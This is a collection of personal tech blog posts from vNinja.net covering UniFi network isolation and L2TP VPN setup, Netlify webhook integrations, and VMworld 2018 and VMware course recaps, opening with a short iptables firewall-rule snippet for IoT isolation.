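# Illustrative only: the UniFi controller provisions this rule for you.
# IOT_NET and LAN_NET are example subnets; substitute your own.
IOT_NET="192.168.42.0/24"
LAN_NET="192.168.1.0/24"
RULE="iptables -A LAN_IN -s $IOT_NET -d $LAN_NET -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
echo "$RULE"
```

The conntrack match is what makes the isolation one-way: IoT devices can answer connections your clients open, but cannot initiate any of their own into the LAN.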
--- # Guide: Creating Isolated Networks with Ubiquiti UniFi URL: https://vNinja.net/2019/08/08/creating-isolated-networks-ubiquiti/ Date: 2019-08-08 Author: christian Tags: networking, ubiquiti, USG, VPN, UniFi Sometimes you might need to create an isolated network, while still allowing that network to access the internet. Ubiquiti UniFi offers the easy option of creating a guest network for this, but that limits traffic between the devices in the same network as well, which might not be desirable. My primary use case for creating an isolated network is to provide my tenant with his own dedicated network, without exposing anything on my own home network — but I still want him to be able to connect his own devices to each other, if he wants to — or even replace the AP with something else, should he choose to do so. Another use case might be to create a dedicated network for all of those IoT-devices that keep popping up, like Amazon Echos, Google Home and Chromecasts, as well as Philips Hue bridges etc. Creating an IoT network is very similar to what I describe below, but there are some other considerations to take into account as well. I will cover those particulars in a later post. The following information was correct at the time of posting, based on a setup with 1 x UniFi Security Gateway 3P (4.4.41.5193700), 1 x UniFi Switch 8 POE-60W (4.0.42.10433) and 5 x UniFi AP-AC-Mesh (4.0.42.10433) 1. Configuring an Isolated Network # To set up an isolated network, log into your controller and go to Settings->Networks and click on the +Create New Network button. This opens up the “Create New Network” page, where you need to provide a few details. First off, give the network a name and select Corporate as the Network Purpose. I left the default Network Group of LAN1 in place, since I don’t have anything connected to the LAN2 port of my USG. 1.1 Define a VLAN # Next up, define a VLAN ID that you want to use for this network.
This can be any number from 1 to 4094 (0 and 4095 are reserved), and you can pick whatever you want here, as long as it doesn’t clash with the untagged default VLAN that everything without a defined VLAN ends up in. In my setup, I used VLAN ID 42. 1.2 Gateway/Subnet # In the Gateway/Subnet I selected to use 192.168.42.1/24. Again, you can choose whatever network ID you want here, but for consistency I like to use the same numbering as I do for my VLAN. This also has the added perk that you can identify which VLAN a device is connected to, just by looking at the IP address it has been assigned. Once you put in a valid CIDR notation for the gateway IP and subnet, a new button appears called Update DHCP Range that lets you autofill the DHCP server details further down on the page. Nice touch by Ubiquiti, which saves us some clicks and potential for fat-fingering any of the details. Of course, if you don’t want your DHCP range for this network to start with x.x.x.6 (which is the default), you can override it if you want. 1.2 DHCP # By default, the USG provides a DHCP service that assigns IPs to your connected clients, for the network you are defining. The default settings here are fine in most cases, and for this setup I just left them as is. Click on Save and your network will be created. That’s the network definition taken care of, now we need to make sure that clients actually connect to it. There are two main ways of doing that: one is creating a new Wireless Network that is connected to the right VLAN and Network. The other is to tie the VLAN to a given port on the UniFi Switch, to ensure that everything connected to that particular port gets the correct network assigned to it. 1.3 Creating a new Wireless Network for your Isolated Network # Creating a new Wireless Network is pretty straightforward. Just head to Settings->Wireless Networks and hit the +Create New Wireless Network button. Give it a Name/SSID, enable the encryption you want and set a Security Key.
Next, expand the Advanced Options section, and select Use VLAN. Put in the VLAN ID you defined for your network in 1.1. You can leave the other settings as default. Once a device connects to your new SSID, it will automatically be put into the specified VLAN and receive an IP address from the virtual DHCP server running on that network. You can quickly test this by connecting your phone or tablet to this network, and see if you can reach the internet. 1.4 Assigning a VLAN to a Port on the UniFi Switch # If you need to put a wired device into an isolated network, you can do that by defining the VLAN on the port it is connected to on the UniFi Switch. I have done this, in addition to creating the Isolated Wireless Network, in order to prevent my tenant from just removing my AP, plugging in something else, and then getting direct access to my internal network. (Note to self: I should really move away from using the default VLAN for my main local network.) In order to do that, go to Devices and find your UniFi Switch. Click on it, and find the Ports icon. Find the correct port, and click on the dropdown for Switch Port Profile. The dropdown will show you all the available networks, and you can then choose which one to assign to that particular port on the switch. Select your network, and click on Apply. Now, anything that connects to that port on the switch automatically gets the VLAN ID and assigned IPs you specified for the network. The default setting of ALL means that the VLAN needs to be tagged on the device itself, and that is not something I want in this scenario. 1.5 Blocking traffic from your new VLAN/Network to your other networks # By default, UniFi allows traffic to flow between networks unless you block it. Since the purpose of this is to isolate the new network from existing ones, we need to pop some new firewall rules into place. Go to Settings->Routing & Firewall and find the Firewall tab.
There you’ll get a list of different options; what we are looking for is LAN IN. Select that, and then click on +Create New Rule. Give the rule a name, again this can be anything you want. All the other default settings are OK in this instance, since we’re looking to block traffic. Make sure that Before predefined rules is selected, the same with Enabled. Expand Source and change the Source Type to Network. Once that is done, use the dropdown menu to find the network you want to isolate and select it. Under Destination, change the Destination Type to Network and in the dropdown, select the network you don’t want devices in your source network to access. In my case that’s the home.local network. Click on Save, and there you go! The rule should now show up under your LAN IN rules. The way it’s set up now, all traffic from all other networks to the new network is allowed, but no traffic is allowed to be initiated from this new network to the network selected in destination above. Once again, connect a phone or tablet to the new network and use a ping app for your chosen platform to verify that the network is indeed isolated from your other networks. Note: Do not ping any of your other UniFi gateways for this test, since you will be able to ping all gateways that are defined (they are all virtual, really). Try to ping, or otherwise access, something else, or you might think the isolation isn’t working as it should. Repeat this process if you have several networks you want to isolate. Conclusion # So, once this is done, traffic is blocked between the new isolated network (VLAN 42) and your other networks (if you created rules for all of them) — but they still have internet access. The networks are now isolated from each other unless you specifically open up communications between them. Creating isolated networks provides a lot more flexibility than using Guest Networks (which also have their place), while still protecting your internal networks.
--- # Win a VMworld US 2019 Pass With Veeam URL: https://vNinja.net/2019/08/08/win-a-vmworld-pass-with-veeam/ Date: 2019-08-08 Author: christian Tags: competition, veeam, vmworld Want to win a VMworld US 2019 pass? # If you want to go to VMworld US 2019 (August 25-29) in San Francisco, and still don’t have a ticket, don’t despair! There is still time, as Veeam is giving away three full conference passes! Get your name in the hat now, and you might just be heading to sunny California! Note: While Veeam is a sponsor of vNinja.net, the site has nothing to do with the competition itself, nor any influence on who wins. --- # VMware Center for Advanced Learning Advanced Architecture Course (CALAAC) URL: https://vNinja.net/2019/07/21/vmware-center-for-advanced-learning-advanced-architecture-course/ Date: 2019-07-21 Author: christian Tags: VMware, Training, CALAAC, CAL, Paris, Architecture Hilton Paris La Defense Back in late April I got notified that I had been accepted to attend the VMware Center for Advanced Learning Advanced Architecture Course, to be held in Paris, France July 9 - 19, 2019. Now that it is done, I find myself on a train from Paris to Nice, rocking out to Hüsker Dü, contemplating just what it is that I have been a part of. First things first — this is not a class that can be taken lightly. You cannot simply sign up for this; you have to be nominated and either work for VMware or a Partner to be taken into consideration to be accepted. Description # The Advanced Architecture Course is a very comprehensive program covering not just technical content across solutions, but also presentation and business skills, the VMware IT Value Model and Digital Workspace Journey Model, solution design best practices, and internal and industry standard architecture methodologies. Once accepted, there is a ton of pre-work that needs to be done before physically attending the course: The pre-work has been assigned to you.
An email from VMware WIRE should be in your inbox. The pre-work is worth 5 points of the overall course score and needs to be completed before Day 1. Please note that it will take approximately 32h to successfully complete this material. An estimated 32 hours of pre-work before attending the class means that this will potentially eat up close to three weeks of your schedule. That is not taking into account the case study that you are required to be intimately familiar with before day 1. Expectations # Complete the pre-work prior to attending the course Attend all 9 days of the course Engage individually in the class, complete some lab activities, and participate in group collaboration activities every day Pass 8 daily Knowledge Check Quizzes during the 9 days Conduct a Team Daily Status/Project report to PMO Develop a Solution Design through team collaboration during the 9 days of the course Present a team presentation of the solution design on the last day of the course, defend the solution and answer panel questions In order to pass the course, participants must obtain an overall score of 70% or above. The overall score is a sum of the pre-work, quizzes, class participation and labs (50%), the team collaboration (10%) and the final team presentation (40%). People, Process and Technology # The Instructors # We were lucky to have an all-star field of instructors during the training, just look at the team Henry Villar got together: CALAAC Instructors The Attendees # In addition to classes running from 08:00 to around 16:00 every day, you will also need to work on the team presentation that is to be presented on day 9 of the training. Realistically you will need to work into the late evening on each of the 8 days in order to get this done. You will stress about it, and you will think that you probably aren’t any good at any of this, and you will be wrong.
CALAAC Attendees and Instructors (Photo by Henry Villar) I was lucky enough to be paired with an amazing team: Burak Bezirci, Senior Consultant, SDDC METNA (Turkey) Christian Mohn, Senior Solutions Architect, Proact (Norway) Domenico Caruso, Consulting Architect, SDDC (Italy) Jason Meers, Senior Systems Engineer, Sub-regional Enterprise SE (UK) And at the end of the week our presentation really came together. In fact, so much so that we were awarded 1st Place Final Team Presentation (Solution Design Architecture)! Way to go team! 1st Place — Team 5 Burak Bezirci, Domenico Caruso, Christian Mohn and Jason Meers, flanked by Carsten Schaefer and Neeraj Arora (Photo by Henry Villar) It has been an exhausting two weeks, but that being said, the time also flew by. If you ever get the chance to attend it, my advice is simple: do it. Know what you are getting yourself into, but do it. It is worth your time if you want to enhance your architecture chops. The class of Paris 2019 was a group of extremely talented participants, all of whom passed it with flying colors (scores ranged from 82 to 92 out of 100), and I’m proud to have been a part of this. I think each and every one of the attendees, and the instructors, did a great job of making these 9 days memorable and valuable for everyone. Of course, I’m especially proud of my team, who really knocked it out of the park on the last day. We are the kingmakers, right Jason? Oh, and I got this shiny badge too! Now, I’m really looking forward to a week of vacation in Nice — I think I have deserved it by now. --- # Guide: Ubiquiti USG Remote User VPN Using L2TP URL: https://vNinja.net/2019/04/10/ubiquiti-usg-remote-user-vpn-using-l2tp/ Date: 2019-04-10 Author: christian Tags: networking, ubiquiti, USG, VPN, UniFi I’ve recently standardized on Ubiquiti equipment in the new house, and so far I am very happy with it. Wireless is working flawlessly, which is more than I could say for my old setup.
A part of the new setup is a UniFi® Security Gateway (USG) that I am using as my gateway/firewall for my fiber connection, so I thought why not use that as my VPN termination as well? OpenVPN has been my weapon of choice for years, and it has served me very well, but it seems a bit overkill to run an entire VM to provide that service — as well as the ongoing maintenance it requires in terms of OS-patching and so on. Note that all screenshots are from UniFi Controller v5.10.20 On the USG there are basically 2 (well 3, but who’s counting) steps required to set up the VPN connection for Remote Users: The following information was correct at the time of posting, based on a setup with 1 x UniFi Security Gateway 3P (4.4.41.5193700), 1 x UniFi Switch 8 POE-60W (4.0.42.10433) and 5 x UniFi AP-AC-Mesh (4.0.42.10433) 1. Configuring the UniFi RADIUS server # In order to be able to authenticate users, the UniFi RADIUS Server needs to be enabled and configured. This is done by navigating to the UniFi Controller, and going to Settings->Services->RADIUS and the Server tab: Enable the server, if it isn’t already. I used all the default settings here, except for the Secret. The Secret here is a custom pre-shared key that RADIUS uses to authenticate devices and users with the service. Define this as you see fit, or use a generator to create it. Put in your values, and hit Apply Changes. 1.1 Creating a RADIUS user account # Navigate to Settings -> Services -> RADIUS and find the Users tab and hit the +Create New Users button. This will bring up the option to create a new user; simply fill out the desired username and password here. For this post I’ll just leave the VLAN part empty, but it allows you to put your VPN clients into different VLANs if you so desire (which is pretty nifty actually!) For Tunnel Type use 3 - Layer Two Tunneling Protocol (L2TP) and for Tunnel Medium Type use 1 - IPv4 (IP Version 4). And that’s both your RADIUS server and first user account taken care of! 2.
Creating a remote user network # Next up is defining a network for the remote users. This is a simple, but very powerful step. Navigate to Settings->Networks and click on the +Create New Network button. This, naturally, brings up the Create New Network screen where you can put in your details. Use your own values for all of this; the most important thing is to select Remote User VPN as the Network purpose, choose L2TP Server as the VPN type, and define a proper Pre-Shared Key. The Pre-Shared Key is needed by clients in addition to the username and password defined in step 1.1 above. I decided to call it Remote User VPN (L2TP), to make it easy to identify. For good measure I defined an entire Class C subnet for my VPN users, because you know, there will definitely be 254 simultaneous connections to my home network at any given time… The important thing to note is that when you define a network for Remote Users, it needs to be a different network than your default network. The IP addresses cannot overlap or otherwise conflict with any other defined networks on the controller. This is simply a dedicated network that by default has full connectivity to the other networks defined on the controller. If you want to limit it somehow, you need to put in place firewall rules that limit its access to the other network(s). Once a client connects, it gets assigned an IP address from the assigned pool automatically; there is no need to configure any further DHCP services or similar in that network. You may need to manually specify your DNS servers here. Try automatic first, but if you cannot connect via FQDN after a successful VPN connection, odds are that you will need to specify your internal DNS servers manually.
Configuring your L2TP VPN Client # And that’s it, you should now be able to connect using a standard L2TP client, using the external IP of your USG (I use a dynamic DNS service for this), your defined username/password and the Pre-Shared Key from the network definition as the Machine Authentication Shared Secret. This is what it looks like using the native OS X Client: Update 6 August 2019 # Thanks to Michael White (notesfrommwhite.net) for asking a few questions that made me update this post with a few more details on the macOS client setup (and the potential DNS issue mentioned above). I seem to have forgotten to mention a minor detail in my original post. In order to make your Mac (and possibly also Windows) able to connect to your internal resources via the DNS server specified above or via IP, you need to do one last thing. Since L2TP connections do not publish routes, the VPN traffic does not really know where to go — which is kind of bad. On macOS this is sorted by either sending all traffic through the VPN connection or re-arranging your network service order. You can also add static routes, but that is a bit more complex, requires manual updates if you change something, and might cause other problems if you connect to a network that has the same private IP range as your defined VPN network — so I’ll leave that out for now. For more details on macOS and static routes, see Persistent Static Routes in macOS. Send all traffic over the VPN # You can force all your networking traffic to go over the VPN connection, by enabling Send all traffic over VPN connection under Advanced… in the macOS network configuration: Changing the macOS Service Order # This was a new one for me, but changing the service order of your network connections in macOS so that the VPN connection comes first (highest priority) makes split-tunneling work too! This way you can access resources in both the local network you are in, as well as resources in your remote VPN network.
Best of both worlds! This is done by going to System Preferences -> Network in macOS and then clicking on the little cog icon. Then simply drag your VPN connection to the top of the list (or as near the top as it will let you). That takes care of the priority, and makes sure the network traffic to your VPN network is routed before the default network route for your network interface. You should now be able to reach your internal resources, as well as “external” ones. --- # Top vBlog 2018 Results URL: https://vNinja.net/2019/03/27/top-vblog-2018-results/ Date: 2019-03-27 Author: christian Tags: vBlog, Voting It has been a slow year for the vNinja.net site so far, but at least the top vBlog 2018 results were published last week! I am very happy to see that the site is still ranked in the top 25, clocking in at a very respectable 22nd place, and that also puts it into the 7th spot in the Independent Blogger category! Thanks to everyone who voted, it’s genuinely appreciated. For those who missed the announcement webcast, you can check out the recording below: Apparently I am an OG, and yes, John, I am from Norway! --- # Netlify, Slack and IFTTT Webhooks for fun and ... profit? URL: https://vNinja.net/2018/12/13/netlify-webhooks/ Date: 2018-12-13 Author: christian Tags: vninja, site, news, hugo, netlify, integration A few months ago I migrated this site from WordPress to Hugo, hosted by Netlify, and I have been very happy with it since. As mentioned in the previous post, I utilize webhooks from Netlify to send alerts to Slack whenever a new build is triggered. The setup for this, on Netlify, is very simple, but I figured I would write a walk-through anyway. Configuring Slack notifications on Netlify # In order to configure outgoing webhooks from Netlify to Slack, you first need to create the incoming one in Slack. Log into api.slack.com and find Incoming Webhooks under Features.
Select Add New Webhook to Workspace, and select which Slack channel you want this webhook to post to. Click on Authorize You will now get redirected back to the Incoming Webhooks page, and under Webhook URL you should now find a new URL. Copy this URL. Log into your Netlify account, and go to Settings > Build & deploy > Deploy Notifications Click on Add build hook, and select Slack integration. Now you select what event you want to send to Slack; you can choose between Deploy Started, Deploy succeeded, Deploy failed, Deploy locked and Deploy unlocked. I’ve configured all of these to use the same webhook URL, but you can use different ones for each if you want — but that also requires more than one Incoming Webhook in Slack. Pick the event you want, and paste your Slack Incoming Webhook URL into the form. That is it. Next time your site builds through Netlify, you should see status messages (for the events you selected) appear in your Slack! Pretty easy, especially since Netlify really has done all the work here and made the integration built-in. All you need is a working incoming Slack Webhook, and some configuration. Since I set this up, I’ve been looking at other ways of integrating with Netlify, and webhooks. IFTTT integration # Netlify also allows you to create Incoming Webhooks, like Slack, but for now it seems the only option is what they call Build Hooks. Basically a Build Hook is a secret URL that triggers a new build if someone accesses it. Normally I build this site automatically when committing new content to GitHub, but it’s also nice to have a way of triggering it manually without having to log into Netlify. In order to do this, I can use a service like IFTTT to trigger it whenever I want to. Log into Netlify and go to Settings > Build & deploy > Build Hooks Click on Add build hook, and give it a name and select which branch you want to use.
I use master, since that’s where I build this site from, and click on Save. Once the build hook has been created, you will see the URL (I’ve anonymized it here, naturally). Log into IFTTT and create a new applet under My Applets > New Applet. Click on +this and search for the Button widget. Next up is the Choose trigger step. Click on Button press, and then +that. For the action service, search for webhooks and select it. Select Make a web request, give it a name, and paste the URL you got from Netlify in step 3 into the URL field. Change the Method to POST, then scroll down and save it — you do not need to put anything into the other fields; only Name, URL and Method are required for this to work. There we are. We now have an IFTTT button that triggers a new build. The nifty thing about this is that it enables me to trigger a build from my phone, or even my watch! Having some fun # Integrations like this open up a wide variety of things you can do; I guess I could get my kitchen lights to blink when a new build is successful, or even change the color to red if a build fails. My wife would most likely veto that one though, so I’ll have to think of something a bit more subtle for a future project. Perhaps some integrations with vRealize Automation are in order… Oh, and yeah, I’m not so sure about the profit part of the title either. --- # Top vBlog 2018 URL: https://vNinja.net/2018/11/19/top-vblog-2018/ Date: 2018-11-19 Author: christian Tags: vBlog, Voting The Top vBlog 2018 voting has opened, so it’s time to go rock the vote and show your favorite bloggers some love for their hard work and dedication. And just like Robert, use this as a chance to expand your feed reader collection! I am using the #topvblog2018 voting as an opportunity to refresh my #feedly #VMware blog list. All vblogs: https://t.co/nDDTs2wbC0 and vote for your favorite blogs here: https://t.co/FZvTpSOf9G #vExpert — Thefluffysysop (@thefluffysysop) November 19, 2018 Happy voting, and good luck everyone!
--- # VMworld 2018 NSX Roving Reporter: Eirik Vada URL: https://vNinja.net/2018/11/10/vmworld-2018-nsx-roving-reporter-eirik-vada/ Date: 2018-11-10 Author: christian Tags: VMworld, VMware, VMworld 2018, TeamProact My good friend, and colleague, Eirik Vada was interviewed by Ather Beg, the NSX Roving Reporter, during VMworld 2018. Since he doesn’t toot his own horn, I decided to do it for him: Have a look at that dashing young man! --- # Headshot-as-a-Service VMworld Europe 2018 URL: https://vNinja.net/2018/11/09/headshot-as-a-service-vmworld-2018/ Date: 2018-11-09 Author: christian Tags: VMworld, VMware, vExpert Headshot-as-a-Service was a success, but I have to say it didn’t quite turn out the way I wanted. Finding a proper location was hard, getting the lighting right was tricky (which I do not think I managed), and without any advertising except my own blog posts and tweets, the turnout was not quite what I had expected. If I’m doing this again, there are some things that need to be changed in both execution and setup. Thankfully I have another year to plan it, if I do it again, that is. That being said, there are some fun photos in the set. Those of you who attended, go ahead and grab your photo from the Flickr album — and yes Amy, there is NO way I’m not using this as the cover photo! Until next time! --- # VeeamON Virtual 2018 — Reserve Your Seat Now URL: https://vNinja.net/2018/11/09/veeamon-virtual-2018-reserve-your-seat/ Date: 2018-11-09 Author: christian Tags: Event, Veeam Hot on the heels of VMworld Europe 2018, Veeam is hosting its annual virtual conference on December 5th. Just like last year, I will be part of the panel in the Expert Lounge!
This online event is a must-attend for IT professionals who are driving their Availability, backup and recovery strategies: Be the first to know all the new features coming in Veeam® Availability Suite™ 9.5 Update 4 Hear from Veeam experts across 15 business, technical, cloud and lab sessions Win prizes throughout the day, including a virtual reality kit! As per usual, the event is divided into three tracks: Business, Technical and Cloud, each with tailored content. For existing Veeam customers, I really recommend the Veeam Availability Suite™ 9.5 Update 4 session with Michael Cade, as well as Plan for disaster with confidence using automated testing in Veeam Availability Orchestrator with Michael White. Loads of good content there, and Veeam Availability Suite 9.5 Update 4 really does contain some goodies. Join us for VeeamON Virtual on Dec. 5 to learn more! --- # VMworld 2018 Europe Day Two URL: https://vNinja.net/2018/11/07/vmworld-2018-europe-day-two/ Date: 2018-11-07 Author: christian Tags: VMworld, VMware, VMworld 2018 VMworld Europe 2018 sets a new attendee record: 13,000! I have to say, VMworld this year seems energetic, driven and focused. Even if there isn’t a slew of new product releases, it feels like VMware has switched gears. Pat Gelsinger’s message about the four superpowers makes sense, and everything VMware does is aimed at bridging these. Superpowers # Cloud Mobile AI/ML EDGE/IOT The keynote by Sanjay Poonen on day two continued to drive this message, as well as how we can use technology for good. Robin Matlock’s “how do we use our collective talents to ensure we have a better future for everyone“ resonates well, and served as a great introduction to Martha Lane Fox, the “Dot com dinosaur”. Her talk about the early .com era and how technology today has a responsibility to be a force for good was great! I think our superpower as an industry isn’t constrained to the four powers listed above; it is even simpler than that.
Our collective superpower is creating and building technology that benefits mankind. Bold words, yes, but it’s true. How can we as technologists help? # Recently I was lucky enough to be the lead architect for the design team that did a complete SDDC deployment for a local health provider. By utilizing vRealize Suite, vSAN and NSX we were able to build a new platform for rapid deployment of machine learning resources for researchers. Once it was up and running, we did a live demo internally that really blew my mind. The researchers use IoT sensors to measure bodily reactions to activity, and by using machine learning on the live datastream they are able to sense when a subject is in a depressed state. This is coupled with feedback from the subjects as well, via an app on their phones. Hopefully this will also enable them to predict when a subject might be entering a depressed state, and then hopefully also prevent it. The project actually embraces all four superpowers: Cloud, Mobile, AI/ML and EDGE/IOT. Hopefully I’ll be able to tell more about that project later; it was a real eye-opener for me and fits into the message VMware is pushing here at VMworld. This is the kind of force for good all of us in the tech field can help enable — and we can do it, now. Headshots-as-a-Service # Both on day 1 and on day 2 I did the Headshots-as-a-Service thing in the hallway right past the exit of the VMvillage. Turnout was pretty good, and there are quite a few photos now uploaded to the Flickr album. Other # I was mildly coerced into being part of #TechConfessions. Should be interesting to see how that video actually turns out… Step count: 12k --- # VMworld 2018 Europe Day One URL: https://vNinja.net/2018/11/06/vmworld-2018-europe-day-one/ Date: 2018-11-06 Author: christian Tags: VMworld, VMware, VMworld 2018 The keynotes at VMworld Europe are always interesting, mostly because one always wonders what was left to announce after the US equivalent earlier in the year.
This year there was a good gap between the US version in August and the European one in November, unlike last year when it was only a couple of weeks, so my hope was that there would be some real news and announcements in Barcelona. I won’t run through the announcements; others have done a way better job of that already (this list will be updated as more things are posted): VMware Cloud Foundation 3.5 by Gregg Robertson VMware Skyline Updates from VMworld Europe VMware Cloud on AWS expands across Europe and the U.S. Other things to note # VMware has opened up two new beta programs: Project Dimension — Delivering Edge and Data Center Infrastructure-as-a-Service Pulse — Delivering Edge and IoT Device Management and Monitoring-as-a-Service Oh, and yeah, VMware just went and acquired ~~Scott Lowe~~ Heptio! Also, fun to see my employer’s logo in the keynote by Pat Gelsinger! After a great day at the Fira, we ended up at the Cohesity party, which had an awesome Queen tribute band playing a full concert. Unbelievable. Step count: 15k --- # Headshot Studio@VMworld Details URL: https://vNinja.net/2018/11/05/headshot-studio@vmworld-details/ Date: 2018-11-05 Author: christian Tags: VMworld, VMware, vExpert As previously announced, I’ll be offering headshots for anyone who pops by at the announced times. After having a look at the VMworld layout this year, I’ve found a spot where I can set up everything without causing anyone trouble. Sadly there was not enough available space at the VMTN and VMware {code} area, but luckily there was some space nearby that I can use! At the very end of 6.0 (the hall where the main entrance is), and before the escalators and the entrance to 7.0 Solutions Exchange, there is a hallway on the left-hand side when heading towards the Solutions Exchange (see the venue map). I will make sure that those manning the booth in the VMTN and VMware {code} area know where it is, as well as the vBrownbag crew.
There is even a black drape hanging from the ceiling, so there should not be any problems with light spill into the nearby booths either. I will set up “shop” there tomorrow, and here’s the agenda again for good measure: The Times and location # Day Time Location Tuesday 6th November 14:30 - 15:30 Hallway at the end of 6.0 Wednesday 7th November 14:30 - 15:30 Hallway at the end of 6.0 Thursday 8th November 14:30 - 15:30 * Hallway at the end of 6.0 * Cancelled due to the Solutions Exchange closing early. --- # VMworld 2018 Europe Day Zero URL: https://vNinja.net/2018/11/05/vmworld-2018-europe-day-zero/ Date: 2018-11-05 Author: christian Tags: VMworld, VMware, VMworld 2018 Day zero started off with the Nordic & Baltic VMware Partner Briefing Brunch at the Hotel W. The partner briefing contained updates on the way forward for VMware Partner Central, as well as upcoming updates to the partner model, something I look forward to. In my opinion, and thankfully VMware’s too, Partner Central is way overdue for a major overhaul, so this is good news! After a great lunch and VMware handing out this year’s regional partner awards, it was time to head to the Fira to get registered. Since the Solutions Exchange is closed Monday, there wasn’t really that much to do other than meet up with a slew of familiar faces for a quick chat. I also did some location scouting for Headshot-as-a-Service and did find a good spot for it (more on that in a later post). Sadly I was unable to pick up and test the equipment 10ZiG has provided for this today, since the Solutions Exchange was closed — I will have to postpone that until tomorrow. Step count: 13k. --- # VMworld 2018 Europe Day Minus One URL: https://vNinja.net/2018/11/04/vmworld-2018-europe-day-minus-one/ Date: 2018-11-04 Author: christian Tags: VMworld, VMware, VMworld 2018, vRockstar I got into Barcelona yesterday, and I have to say it is really nice to have some time before the actual VMworld craziness starts.
With no need to rush anything, we just found the hotel Arrow ECS Norway has booked for us, and relaxed. Well, I say relax, but I mean walked around Barcelona like a madman. 22k steps and 16.3 km take a toll! The final step count for this week should be pretty insane. This year’s hotel, the Grand Marina, is located smack dab in the Port of Barcelona. The last few VMworlds we have stayed at the Pullman Skipper, a great hotel in the Olympic Port, but I like that it has been switched around this year. The Grand Marina is also located closer to La Rambla, which is nice! First order of “official” VMworld business was dinner with Eirik at my favorite tapas joint, Guru Food & Cocktails — if you’re ever there, don’t leave without checking out the nachos! This was the perfect run-up to this year’s vRockstar party at the Obama English Pub. The vRockstar party has become a staple of the vCommunity, and VMworld Europe, and impressively enough, it is the 7th time Patrick Redknap, Marco Broeken and team arrange what can only be described as the ultimate kick-off for VMworld Europe. Given the amount of work this is, it is truly special that they do this for the vCommunity every year. Huge thanks to them, as well as the sponsors who make this possible year after year. Even though I did not turn up in the infamous Justin Bieber t-shirt this year, I did “rock” a related t-shirt this year as well (in 2017 I “chickened” out and wore a Foo Fighters one). Yes, I was indeed the one wearing a Harry Styles tee. This whole t-shirt thing has become somewhat of a tradition, and I have one restriction — I’ll only wear t-shirts from acts I’ve actually seen live. vRockstar was, as it always is, awesome, and I met up with a bunch of the usual suspects and a bunch of fresh faces as well. A great start to the week, now to get ready for the actual conference… Step count for day zero? Just above 19k.
--- # VMworld 2018 Barcelona — Tips from the Nordics URL: https://vNinja.net/2018/10/30/vmwworld-2018-tips-nordic/ Date: 2018-10-30 Author: christian Tags: VMworld, VMware, VMworld 2018, Blogtober2018 Liselotte Foverskov, blogger, vExpert and VMUG.dk extraordinaire, has created a great video with VMworld 2018 tips from various Nordic VMworld veterans, just in time for the event in Barcelona next week. Check it out # The video features Henrik Moenster, Karina Kathinka Søndergaard, Robert Jensen, Olafur Helgi Haraldsson, Christian Mohn, Kim Højer Jakobsen, Terkel Olsen, Frank Brix Pedersen and Liselotte Foverskov. Great tips for and from everyone. See you in Barcelona, and remember: t-shirts are important! Thanks to Liselotte for arranging this! --- # Headshot Studio@VMworld Agenda and Details URL: https://vNinja.net/2018/10/26/headshot-studio@vmworld-agenda/ Date: 2018-10-26 Author: christian Tags: VMworld, VMware, vExpert, Blogtober2018 VMworld Europe 2018 is just over a week away, and I figured it would be time to announce some more details surrounding Headshot-as-a-Service (HaaS). Since I have been unable to secure a permanent location for this at the event, I’ve decided to set it up somewhere close to the Bloggers Lounge and vBrownbag in the Social Hub. The Times and location # Day Time Location Tuesday 6th November 14:30 - 15:30 Hallway at the end of 6.0 Wednesday 7th November 14:30 - 15:30 Hallway at the end of 6.0 Thursday 8th November 14:30 - 15:30 * Hallway at the end of 6.0 * Cancelled due to the Solutions Exchange closing early. I will get my hands on the equipment, sent directly to Barcelona, on Monday 5th, and try to find a suitable location then. I have also decided against having a sign-up form for this; it will be first come, first served at the times and location above — please form an orderly queue.
The Equipment # Canon EOS 80D Sigma 35mm F1.4 DG HSM Art Lens Canon EF 70-200mm f/4L USM Lens Canon Speedlite 320EX Canon Speedlite 430EX III 2 x Godox 24-inch x 24-inch Softboxes with stands Fotodiox 5x7’ (Collapsible Black + White 2-in-1 Background) Neewer 43-inch / 110cm 5-in-1 Collapsible Multi-Disc Light Reflectors The How # The background size is only 1.5m x 2.1m, which means I will not be able to do full-size portraits (hence the Headshots-as-a-Service moniker). Hopefully this should be more than enough to provide proper, and consistent, butterfly lighting in a small space. I really hope that is the case, as I will not be able to test the setup before getting my hands on the lighting equipment at the Fira in Barcelona. The plan is to take a couple of headshots, and have them wirelessly transferred to my MacBook for instant review. Once a picture has been selected, it will be marked for upload. Once the day’s headshot session is over, I will grab the selected photos, do a quick round of processing, and upload them to a pre-made Flickr album where everyone can find them once they are uploaded. I will announce availability of the photos on Twitter; I will not be able to contact each and every one of you personally to let you know your photo has been published. If possible I will try to capture everyone’s names while shooting, in order to name the photos properly when uploaded. The images will be licensed with Attribution 4.0 International (CC BY 4.0), which basically means that they are free to use as you see fit. If you use them for anything, I’d love to know though! Once again, huge thanks to 10ZiG for sponsoring this! There is no way this would happen without their support for this small community project.
--- # Nordic VMUG Conference 2019 Announced URL: https://vNinja.net/2018/10/24/nordic-vmug-conference-2019/ Date: 2018-10-24 Author: christian Tags: Speaking, UserCon, VMUG, Blogtober2018 VMUG Denmark is yet again arranging the Nordic VMUG Conference, this time in Copenhagen on January 31st 2019. The agenda is still a work in progress, and is not finalized, but the keynotes are: Opening Keynote by Joe Baguley, VP and CTO, EMEA Closing Keynote by Seth Shostak, Senior Astronomer, SETI Institute The venue is the same as last year, namely the Fields movie theaters, and judging by the tweets and photos from the 2018 event, that is one awesome VMUG venue. Duncan Epping presenting in 2018. Photo by Liselotte Foverskov I will be attending this year; it has been quite a few years since the last time I was there, back in 2015. As it looks now, I’ll even have a session this year, but that is still a work in progress at this point. I can’t wait to see the rest of the agenda, as well as actually attending again. Will I see you there? Register now! Big kudos to the Danish VMUG team who put this together every year. You’re doing an awesome job organising this! --- # Veeam Vanguard Summit 2018 - a Recap URL: https://vNinja.net/2018/10/22/veeam-vanguard-summit-2018-recap/ Date: 2018-10-22 Author: christian Tags: Travel, Veeam Vanguard, Veeam, Blogtober2018 After decompressing for a few days, I’m finally able to wrap my head around the Veeam Vanguard Summit 2018 in Prague. The Veeam team provided loads of great content for us Vanguards: public, embargoed and NDA-rated alike.
